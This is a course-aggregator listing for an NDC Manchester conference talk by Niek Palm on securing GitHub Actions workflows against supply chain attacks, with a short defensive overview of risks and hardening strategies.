Class Central is learner-supported. When you buy through links on our site, we may earn an affiliate commission.

YouTube

GitHub Actions Security - From CI Nightmare to Supply Chain Sentinel

NDC Conferences via YouTube

Start learning Write review
Scrimba Ad

Our career paths help you become job ready faster

Learn More → CodeSignal Ad

JavaScript Programming for Beginners

Learn More →

Overview

Coursera Flash Sale
40% Off Coursera Plus for 3 Months!
Grab it
Learn to transform GitHub Actions from a potential security vulnerability into a robust supply chain defense mechanism in this comprehensive conference talk. Explore the critical security risks inherent in CI/CD automation, including token leaks, script injections, and threats from untrusted third-party Actions or compromised runners that can lead to supply chain attacks through malicious code injection, credential theft, or release tampering. Discover actionable strategies for securing your GitHub Actions workflows by implementing the Principle of Least Privilege with GITHUB_TOKEN and OIDC, properly vetting third-party Actions, securing runners, and hardening workflows through input sanitization and code signing. Gain practical knowledge to identify misconfigurations that create attack vectors and understand how real-world incidents demonstrate the urgent need for security in automated pipelines, ultimately enabling you to ensure secure automation and turn your CI/CD processes into a strong supply chain sentinel.

Syllabus

GitHub Actions Security: From CI Nightmare to Supply Chain Sentinel - Niek Palm - NDC Manchester

Taught by

NDC Conferences

Reviews

Start your review of GitHub Actions Security - From CI Nightmare to Supply Chain Sentinel

Start learning

Never Stop Learning.

Get personalized course recommendations, track subjects and courses with reminders, and more.

Sign up for free
Someone learning on their laptop while sitting on the floor.